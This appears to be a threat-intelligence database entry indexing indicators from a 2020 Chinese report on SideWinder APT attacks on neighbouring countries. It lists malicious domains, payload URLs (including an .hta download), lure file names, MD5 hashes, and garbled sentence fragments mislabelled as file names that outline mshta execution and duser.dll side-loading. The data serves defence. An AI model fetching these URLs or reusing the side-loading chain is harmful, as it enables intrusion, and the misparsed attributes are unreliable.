响尾蛇APT组织近期针对周边国家和地区的攻击活动分析
Tags
Common Information
Type Value
UUID bed1426f-1a9a-4c0d-8f5c-3bb96b3c72cb
Fingerprint fba047aeb6136b96
Analysis status DONE
Considered CTI value 2
Text language
Published May 20, 2020, midnight
Added to db Dec. 21, 2024, 2:16 a.m.
Last updated Dec. 21, 2024, 3:06 a.m.
Headline 响尾蛇APT组织近期针对周边国家和地区的攻击活动分析
Title 响尾蛇APT组织近期针对周边国家和地区的攻击活动分析
Detected Hints/Tags/Attributes 7/0/59
Source URLs
Attributes
Details Type #Events CTI Value
Details Domain 3
classes.zip
Details Domain 25
test.zip
Details Domain 32
sandbox.ti.qianxin.com
Details Domain 6
reawk.net
Details Domain 6
ap-ms.net
Details Domain 3
www.link-cdnl.net
Details Domain 4
kat0x.net
Details Domain 5
cloud-apt.net
Details Domain 4
www.d01fa.net
Details Domain 2
www.nrots.net
Details Domain 3
www.fdn-en.net
Details Domain 8
it.rising.com.cn
Details Domain 6752
163.com
Details File 3
classes.zip
Details File 2
pak_army_deployed_in_country_in_fight_against_coronavirus.pdf
Details File 3
additional_csd_rebate.pdf
Details File 2
daraz-coupon.pdf
Details File 25
test.zip
Details File 2
lnk以及pak_army_deployed_in_country_in_fight_against_coronavirus.pdf
Details File 2
执行后将通过mshta.exe
Details File 2
解码加载的dll名为lnikzip.dll
Details File 2
若下载成功则通过mshta.exe
Details File 2
解密执行的dll名为stinstaller.dll
Details File 2
之后拷贝系统目录下的rekeywiz.exe
Details File 2
并命名为duser.dll
Details File 2
之后启动恶意软件目录下的rekeywiz.exe
Details File 2
采用白加黑的方式加载恶意duser.dll
Details File 39
duser.dll
Details File 2
名为systemapp.dll
Details File 2
最终恶意payload也为systemapp.dll
Details File 2
19658.html
Details md5 2
865e7c8013537414b97749e7a160a94e
Details md5 2
3c9f64763a24278a6f941e8807725369
Details md5 2
120e3733e167fcabdfd8194b3c49560b
Details md5 2
7442b3efecb909cfff4aea4ecaae98d8
Details md5 2
d7187130cf52199fae92d7611dc41dac
Details md5 2
bad0917fdb0963903747e86c33b74c08
Details md5 2
58363311f04f03c6e9ccd17b780d03b2
Details md5 2
fef12d62a3b2fbf1d3be1f0c71ae393e
Details md5 2
f6d29ca878f0815935fc1de2def06c46
Details md5 2
dbb09fd0da004742cac805150dbc01ca
Details md5 2
2c798c915568b3fd8ee7909c45a43168
Details md5 2
4476ee858c455a84031d3f54a0dfe73d
Details md5 2
affbb0cf97289220b88dee2961e0a4b3
Details md5 2
cf18974bb2f68e7d9d172d939a4ba313
Details md5 2
4dc475b2055b5a880cbd67526b0f6e3c
Details md5 2
265222bbe164d55750ca0ee1a53f2de2
Details md5 2
4e5deecb468ab36c5fe347a39878c949
Details Url 9
https://sandbox.ti.qianxin.com
Details Url 94
https://sandbox.ti.qianxin.com/sandbox/page
Details Url 2
http://www.au-edu.km01s.net/images/e2bc769a/16914/11662/84c7b244/3387c59,http://www.au-edu.km01s.net/cgi/8ee4d36866/16914/11662/eeef4361/file.hta
Details Url 2
https://kat0x.net/202/pqvzogpu3ormmdi7cyxmi9cwfgf2idgzkuiz2ybi/16914/11662/b0aad51f
Details Url 2
https://www.link-cdnl.net/202/cklcpzebtbrgqv4jbbk1at910xhhknvpnnfm4o10/-1/2369/ecc56eb4
Details Url 3
https://cloud-apt.net/202/h5lvzvpjay89njsklmam4psgoxdnzrgs0ybwrvt7/20/11248/371a005a
Details Url 3
http://www.d01fa.net/images/d817583e/16364/11542/f2976745/966029e
Details Url 2
http://www.nrots.net/images/5328c28b/15936/11348/7c8d64e9/e17e25e
Details Url 2
http://www.fdn-en.net/images/0b0d90ad/-1/2418/9ccd0068/9d68236
Details Url 2
https://ti.qianxin.com/blog/articles/coronavirus-analysis-of-global-outbreak-related-cyber-attacks
Details Url 2
http://it.rising.com.cn/dongtai/19658.html